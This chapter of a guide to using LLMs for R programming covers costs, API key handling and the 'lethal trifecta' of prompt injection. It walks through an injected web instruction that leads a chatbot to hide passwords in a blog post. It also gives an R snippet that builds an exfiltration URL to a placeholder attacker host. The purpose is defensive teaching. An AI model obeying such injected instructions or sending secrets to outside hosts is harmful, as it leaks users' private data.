12 Cost and security
This chapter addresses two practical considerations when using LLMs for R programming: what they cost, and how to use them securely.
12.1 Cost
For researchers at institutions in wealthy countries, the cost of using genAI to support coding is small compared to other research costs, such as hiring staff or open-access publication fees.
The costs could be more significant for students or researchers on a tight budget.
It is worth exploring your options to identify which providers offer free credits or free accounts. For instance, as of writing, GitHub Copilot offers free subscriptions for students and teachers.
Agents like Roo Code can cost more than a monthly subscription, depending on how much you use them. They are pay-per-token, so expenses can rack up with heavy use. Likewise, literature-search applications could cost hundreds or thousands of dollars if you are screening thousands of papers.
For example, I estimated that processing 6000 abstracts to extract data for a literature review might cost about USD 300 (including the cost of developing the prompts).
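A back-of-envelope calculation helps you budget before committing. The token counts and per-token prices below are illustrative assumptions, not real quotes, so substitute your provider's current pricing:

```r
# Rough per-pass cost of screening abstracts via a pay-per-token API.
# All numbers are assumptions for illustration; substitute your own.
n_abstracts         <- 6000
tokens_per_abstract <- 400    # assumed prompt + abstract input tokens
tokens_per_response <- 150    # assumed structured-output tokens
price_in_per_1m     <- 3.00   # assumed USD per million input tokens
price_out_per_1m    <- 15.00  # assumed USD per million output tokens

input_cost  <- n_abstracts * tokens_per_abstract / 1e6 * price_in_per_1m
output_cost <- n_abstracts * tokens_per_response / 1e6 * price_out_per_1m
total_cost  <- input_cost + output_cost
total_cost  # about USD 21 for a single pass under these assumptions
```

Note that a single pass is cheap under these assumptions; much of a real budget goes to repeated passes while developing and validating the prompts, which is why my estimate above is several times larger.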
If you find you are using LLM agents heavily and your costs are mounting, you could investigate the chat forums for your agent application to learn about token optimisation. Alternatively, you could sign up for a monthly subscription-based account, such as Claude Code.
12.2 API security
- Managing API keys and credentials: keep keys in environment variables or a secrets manager, never in scripts or version control
- Sanitising inputs to remove sensitive information before it is sent to a hosted model
- Weighing local versus cloud-based LLM solutions: local models keep your data on your machine, usually at some cost in capability
- Auditing and monitoring LLM interactions, so you can review what data was sent and what the model did
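On the first point, the usual pattern in R is to keep keys out of scripts entirely and read them from environment variables at runtime. A minimal sketch, where `MY_LLM_API_KEY` is a placeholder name (substitute whatever variable your provider's package expects):

```r
# Store the key once in ~/.Renviron (a line like MY_LLM_API_KEY=...),
# which usethis::edit_r_environ() will open for you. Never commit
# .Renviron to version control.
get_api_key <- function(var = "MY_LLM_API_KEY") {
  key <- Sys.getenv(var)
  if (!nzchar(key)) {
    stop("Set ", var, " in your .Renviron and restart R.", call. = FALSE)
  }
  key
}
```

LLM packages for R such as ellmer follow the same convention, looking up provider keys from environment variables rather than taking them as function arguments.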
12.3 Lethal trifecta for prompt injection attacks
Never allow the agent to do all three of these things at the same time:
- Read unverified material from the web (even if it's material you downloaded earlier)
- Have access to sensitive data (including your personal data, API keys, and research data)
- Upload information to the web (including creating webpages or pushing commits to GitHub)
The lethal trifecta for prompt injection attacks (a term coined by Simon Willison) is the combination of access to private data, the ability to communicate externally, and exposure to untrusted content.
If your agent can read untrusted sources, those sources may contain malicious prompts. These prompts could convince the agent to do things like send your personal data to an attacker or write malicious code that runs on your computer.
It is deceptively easy to cross the line into the lethal trifecta. For example, you could ask ChatGPT to write a blog post for you based on a web search. ChatGPT and other chat platforms often retain access to your past chat history, which could contain personal information. Now you've ticked off two of the three conditions.
Now say that during the web search ChatGPT finds malicious instructions telling it to hide your personal data in the blog post, for example by putting your passwords in the alt text of an image. Once you publish that post, all three conditions of the trifecta are met.
Agents that run on your computer pose a greater risk, because they can meet all three conditions most of the time. Any agent that can write code can write code that sends messages over the web (including in R). Most agents can also change their working directory, so they could explore any files on your computer, and most now have web-search capabilities. So the lethal trifecta is in place.
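To see why "can run R code" implies the external-communication condition, consider how little code it takes. This sketch only constructs a malicious URL of the kind an injected prompt might request; nothing is sent, and `attacker.example` is a made-up placeholder domain:

```r
# The "communicate externally" leg of the trifecta needs only base R.
# Nothing is sent here: we just build the URL an injected prompt could
# tell an agent to fetch. The domain and secret are placeholders.
secret <- "PRETEND-API-KEY"   # stands in for a real credential
exfil_url <- paste0(
  "https://attacker.example/collect?key=",
  utils::URLencode(secret, reserved = TRUE)
)
exfil_url
# A single call such as readLines(exfil_url) or
# download.file(exfil_url, tempfile()) would deliver the secret.
```

The point is not that this code is clever; it is that any agent allowed to execute arbitrary R already has everything it needs to transmit data.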
In the future I hope that sandboxing will become more accessible. A sandbox creates an environment on your computer that constrains which files the agent can access. Currently, though, setting up a sandbox requires a high level of technical sophistication. It may also be difficult if you have a university-owned computer that is locked down against software installation.
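For readers who do want to experiment, one approximation of a sandbox is running an agent inside a container that has no network access and can see only one project directory. This is a sketch with placeholder names (`my-agent-image`, `agent-cli`), not a recipe for any particular tool:

```shell
# Run an agent CLI inside Docker so it can only see one project folder
# and cannot reach the network (image and command names are placeholders).
#   --network none      removes the "communicate externally" leg
#   -v "$PWD":/workspace  the agent sees only this project directory
docker run --rm -it \
  --network none \
  -v "$PWD":/workspace:rw \
  -w /workspace \
  my-agent-image agent-cli
```

Note the trade-off: with `--network none` a cloud-backed agent also loses web search and API access, so in practice you relax restrictions selectively, which is exactly where sandboxing gets fiddly.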
Agents you run in VSCode are currently fairly safe, but not 100% safe. Most have explicit instructions not to change working directories. However, instructions to LLMs are more like guidelines. I have often noticed the Copilot agent trying to use cd in the terminal to change the working directory. Its use of cd has been innocent in my case (it just wants a better view of the project), but I still never allow it.
So for now, watch what your agents are doing, and be careful about what data they can easily access and what web sources or reference material they read.